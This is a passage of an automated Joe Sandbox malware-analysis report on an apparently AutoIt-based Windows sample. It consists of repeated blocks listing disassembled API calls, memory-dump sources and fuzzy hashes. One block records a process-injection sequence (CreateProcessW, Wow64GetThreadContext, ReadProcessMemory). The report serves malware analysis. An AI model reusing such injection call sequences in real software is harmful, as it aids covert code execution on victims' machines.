                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: e08e5740376f1f097e20cc84181f664d20e37d1f8c8171cd06e336dfcd3a4d45
                                                          • Instruction ID: 61ed4139bcc615ac9cd745d5b3d5cd18db119d55a8ca79ae7a22a72499414ca5
                                                          • Opcode Fuzzy Hash: e08e5740376f1f097e20cc84181f664d20e37d1f8c8171cd06e336dfcd3a4d45
                                                          • Instruction Fuzzy Hash: F541D27190820D9FCB16EFA8D8869BAB7E8EF09344B24445DE3859B782DB75EC01C760
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                          • Instruction ID: a626b4a1255879f22386485809f9f95be78b5b5ae274c5178a30be6846d4de3f
                                                          • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                          • Instruction Fuzzy Hash: 753184B1714606AFCB05DF68C8D1E69B3A9FF483207158629E519CB7D1EB30ED50CB90
                                                          APIs
                                                          • IsThemeActive.UXTHEME ref: 00394834
                                                            • Part of subcall function 003B336C: __lock.LIBCMT ref: 003B3372
                                                            • Part of subcall function 003B336C: DecodePointer.KERNEL32(00000001,?,00394849,003E7C74), ref: 003B337E
                                                            • Part of subcall function 003B336C: EncodePointer.KERNEL32(?,?,00394849,003E7C74), ref: 003B3389
                                                            • Part of subcall function 003948FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00394915
                                                            • Part of subcall function 003948FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0039492A
                                                            • Part of subcall function 00393B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00393B68
                                                            • Part of subcall function 00393B3A: IsDebuggerPresent.KERNEL32 ref: 00393B7A
                                                            • Part of subcall function 00393B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004552F8,004552E0,?,?), ref: 00393BEB
                                                            • Part of subcall function 00393B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00393C6F
                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00394874
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                          • String ID:
                                                          • API String ID: 1438897964-0
                                                          • Opcode ID: 0397a2344e12d41e611119ad1e55ff2e32169a1460cd43c7f93c218691187b40
                                                          • Instruction ID: b1eed0d50b8bfcd2f43e6eb9012d8421b62c4f5b6232a97c05c83d39e6c0c223
                                                          • Opcode Fuzzy Hash: 0397a2344e12d41e611119ad1e55ff2e32169a1460cd43c7f93c218691187b40
                                                          • Instruction Fuzzy Hash: 7E119D719183519BCB01EF29D80595EBBE8EF85750F10452EF044872B2DBB1D949CB9A
                                                          APIs
                                                            • Part of subcall function 003B571C: __FF_MSGBANNER.LIBCMT ref: 003B5733
                                                            • Part of subcall function 003B571C: __NMSG_WRITE.LIBCMT ref: 003B573A
                                                            • Part of subcall function 003B571C: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,?,?,?,003B0DD3,?), ref: 003B575F
                                                          • std::exception::exception.LIBCMT ref: 003B0DEC
                                                          • __CxxThrowException@8.LIBCMT ref: 003B0E01
                                                            • Part of subcall function 003B859B: RaiseException.KERNEL32(?,?,?,00449E78,00000000,?,?,?,?,003B0E06,?,00449E78,?,00000001), ref: 003B85F0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 3902256705-0
                                                          • Opcode ID: 13e99d6a0478a05cb65cdfb9250f107c7fa3b88fb89b10bcfa2f9967da269474
                                                          • Instruction ID: acb21f7a316579e756253bf194a267bdef03fe48b327680e006ccdd000f750af
                                                          • Opcode Fuzzy Hash: 13e99d6a0478a05cb65cdfb9250f107c7fa3b88fb89b10bcfa2f9967da269474
                                                          • Instruction Fuzzy Hash: 66F0F431A0022D76CB16AB94EC01ADF77AC9F01358F50442AFA089A981DFB09A80C2D9
                                                          APIs
                                                            • Part of subcall function 003B8B28: __getptd_noexit.LIBCMT ref: 003B8B28
                                                          • __lock_file.LIBCMT ref: 003B53EB
                                                            • Part of subcall function 003B6C11: __lock.LIBCMT ref: 003B6C34
                                                          • __fclose_nolock.LIBCMT ref: 003B53F6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                          • String ID:
                                                          • API String ID: 2800547568-0
                                                          • Opcode ID: f6dde5ae0c94528fb40db0b65ddfa2723293e16d8b384054b7eaeb93d128973f
                                                          • Instruction ID: 85daca783335ccc79698977d2901ba5c26d57866d55aff05423a72f79b370ff0
                                                          • Opcode Fuzzy Hash: f6dde5ae0c94528fb40db0b65ddfa2723293e16d8b384054b7eaeb93d128973f
                                                          • Instruction Fuzzy Hash: 66F0BB31900A049ADB23AF7598067ED7BE46F4137DF258109E628AFEC1CFFC89419B51
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 0131748B
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01317521
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01317543
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394800227.0000000001315000.00000040.00000020.00020000.00000000.sdmp, Offset: 01315000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1315000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                          • Instruction ID: c11be901399e136a2e234da6110a304972cf14d83b991528f198d517b6232bf3
                                                          • Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                          • Instruction Fuzzy Hash: DC12BD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction ID: 27c015dbf9e032d06435ddc0728dbd23130556e0de64d5464d45f63a4810acea
                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction Fuzzy Hash: B931D670A001099BC71EDF58C4849AAFBA6FB59304B6587A5E90ACFB51DB31EDC1DBC0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: 59466f5ed7da0b1947242bd96a11573070f4c6b5f8563d198786446faec54a09
                                                          • Instruction ID: 6dea65918ebbad3643ea363439e296e7c9875a68fb4282a8488a45ad975c2864
                                                          • Opcode Fuzzy Hash: 59466f5ed7da0b1947242bd96a11573070f4c6b5f8563d198786446faec54a09
                                                          • Instruction Fuzzy Hash: 1441F5745087418FDB16DF18C458B1ABBE1BF45318F0A89ACE99A8B762C731EC45CF92
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: df9979208df031f35904bd776eb44f0db3df839bcd71914adf39e13b52e99f65
                                                          • Instruction ID: a8093dc78a336b70531b6cdd055121d60cb0d512fd4ae1f502b5d3c11a633516
                                                          • Opcode Fuzzy Hash: df9979208df031f35904bd776eb44f0db3df839bcd71914adf39e13b52e99f65
                                                          • Instruction Fuzzy Hash: 4A212472614A08EBDF168F15E841BAE7BB8FB14350F21842DE446C9590EB309990D705
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: debd4a192cd98d234165f3013593147144481ea24bfc443804d127757904428b
                                                          • Instruction ID: 1161fd944ead3b3e0978b22b57b2ce548261ce861b61128a7d7353987b959147
                                                          • Opcode Fuzzy Hash: debd4a192cd98d234165f3013593147144481ea24bfc443804d127757904428b
                                                          • Instruction Fuzzy Hash: 7D11A231618216ABDB16DF28C886C6EB7A9EF85324725811AE919CB3D1DB32EC11C790
                                                          APIs
                                                            • Part of subcall function 00394BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00394BEF
                                                            • Part of subcall function 003B525B: __wfsopen.LIBCMT ref: 003B5266
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00394E0F
                                                            • Part of subcall function 00394B6A: FreeLibrary.KERNEL32(00000000), ref: 00394BA4
                                                            • Part of subcall function 00394C70: _memmove.LIBCMT ref: 00394CBA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                          • String ID:
                                                          • API String ID: 1396898556-0
                                                          • Opcode ID: b7a6665e0346e69fca43c2b2ff3f94e73d7d34fb7dd64881f6fb584f0a9a1b9c
                                                          • Instruction ID: fc23fadb40a9b1bfc5ff5e3398abf75f3ef62a5a60c330194e3477cfd95a351c
                                                          • Opcode Fuzzy Hash: b7a6665e0346e69fca43c2b2ff3f94e73d7d34fb7dd64881f6fb584f0a9a1b9c
                                                          • Instruction Fuzzy Hash: 8711E331A00306ABCF16BF70DC12FAD77A8AF44710F10882DF642AF181DA719E069B51
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: 1dc5770e54ce052129ef38778823599f408f7f56eec8ea88b44a002210f1193f
                                                          • Instruction ID: 6ce8c370f6d2cf2f1a71c6a2ad791cbee5839196eec71806c0690e7bf123cec4
                                                          • Opcode Fuzzy Hash: 1dc5770e54ce052129ef38778823599f408f7f56eec8ea88b44a002210f1193f
                                                          • Instruction Fuzzy Hash: 8E211574908701DFCB1ADF64C454B5ABBE1BF84314F05896CE98A9B722D731E805CB92
                                                          APIs
                                                          • __lock_file.LIBCMT ref: 003B48A6
                                                            • Part of subcall function 003B8B28: __getptd_noexit.LIBCMT ref: 003B8B28
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __getptd_noexit__lock_file
                                                          • String ID:
                                                          • API String ID: 2597487223-0
                                                          • Opcode ID: 580975f94ecedc29cc28d472852ff18b9849fd57801a794c8f80df151269d713
                                                          • Instruction ID: 7cbe0b349ef6e4f71dee7b6c816ddedde6194cf451bbe58ca04e05ab397b3003
                                                          • Opcode Fuzzy Hash: 580975f94ecedc29cc28d472852ff18b9849fd57801a794c8f80df151269d713
                                                          • Instruction Fuzzy Hash: 92F0AF31900609ABEF13AFB48C067EE36A5AF0032DF158418F624DE992CB79C951DB55
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,004552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00394E7E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 2cfc68063a7aebdc45f6a109a2c4b94f3de6d19c5161350727f83ceec56252c4
                                                          • Instruction ID: 94c2dd9dd3c8f5eec2e3d8a04b1118f4fbd84133046f990b61e1c4a3bf07cda7
                                                          • Opcode Fuzzy Hash: 2cfc68063a7aebdc45f6a109a2c4b94f3de6d19c5161350727f83ceec56252c4
                                                          • Instruction Fuzzy Hash: C2F03975901711CFCF369F68E494C56BBE5BF143293218A3EE2DA82A20C7329886DF40
                                                          APIs
                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003B07B0
                                                            • Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath_memmove
                                                          • String ID:
                                                          • API String ID: 2514874351-0
                                                          • Opcode ID: 083515576d15c9bbe3af117d9ef89b01efa20ae0a5095bbf75f5b9453fd7902a
                                                          • Instruction ID: 6e8af3f9a6ed3d73f5839fe0ffd05ddf869fa2fefcbf6ffe6025ec2f5e11a8b0
                                                          • Opcode Fuzzy Hash: 083515576d15c9bbe3af117d9ef89b01efa20ae0a5095bbf75f5b9453fd7902a
                                                          • Instruction Fuzzy Hash: 3DE0863690422857C72196589C05FEA779DDB896A0F0441B5FC08D7245D9719C8086D0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __wfsopen
                                                          • String ID:
                                                          • API String ID: 197181222-0
                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction ID: 9647da0dbae9dcaec1ac58e49c3bc8fe947a78922bdf8586096939d706b7f987
                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction Fuzzy Hash: F6B0927644020C77CE022A82EC02B893B299B41768F408020FB0C1C562A673AA649A89
                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 01317CE1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394800227.0000000001315000.00000040.00000020.00020000.00000000.sdmp, Offset: 01315000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1315000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                          • Instruction ID: d9f2646dc3760818bcc63c19932a194a98bd633b505323e1e1291ae5f41041ff
                                                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                          • Instruction Fuzzy Hash: 99E0BF7494010EEFDB10EFA4DA496DE7BB4EF04301F1005A1FD05D7685DB309E558A62
                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 01317CE1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394800227.0000000001315000.00000040.00000020.00020000.00000000.sdmp, Offset: 01315000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1315000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction ID: abe55e528f270010c8ab0f74097faaebe0531f6e24fe1f6158523ce182c39575
                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction Fuzzy Hash: AFE0E67494010EDFDB00EFB4DA4969E7FB4EF04301F100161FD01D2285DA309D508A62
                                                          APIs
                                                            • Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0041CB37
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0041CB95
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0041CBD6
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0041CC00
                                                          • SendMessageW.USER32 ref: 0041CC29
                                                          • _wcsncpy.LIBCMT ref: 0041CC95
                                                          • GetKeyState.USER32(00000011), ref: 0041CCB6
                                                          • GetKeyState.USER32(00000009), ref: 0041CCC3
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0041CCD9
                                                          • GetKeyState.USER32(00000010), ref: 0041CCE3
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0041CD0C
                                                          • SendMessageW.USER32 ref: 0041CD33
                                                          • SendMessageW.USER32(?,00001030,?,0041B348), ref: 0041CE37
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0041CE4D
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0041CE60
                                                          • SetCapture.USER32(?), ref: 0041CE69
                                                          • ClientToScreen.USER32(?,?), ref: 0041CECE
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0041CEDB
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0041CEF5
                                                          • ReleaseCapture.USER32 ref: 0041CF00
                                                          • GetCursorPos.USER32(?), ref: 0041CF3A
                                                          • ScreenToClient.USER32(?,?), ref: 0041CF47
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0041CFA3
                                                          • SendMessageW.USER32 ref: 0041CFD1
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0041D00E
                                                          • SendMessageW.USER32 ref: 0041D03D
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0041D05E
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0041D06D
                                                          • GetCursorPos.USER32(?), ref: 0041D08D
                                                          • ScreenToClient.USER32(?,?), ref: 0041D09A
                                                          • GetParent.USER32(?), ref: 0041D0BA
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0041D123
                                                          • SendMessageW.USER32 ref: 0041D154
                                                          • ClientToScreen.USER32(?,?), ref: 0041D1B2
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0041D1E2
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0041D20C
                                                          • SendMessageW.USER32 ref: 0041D22F
                                                          • ClientToScreen.USER32(?,?), ref: 0041D281
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0041D2B5
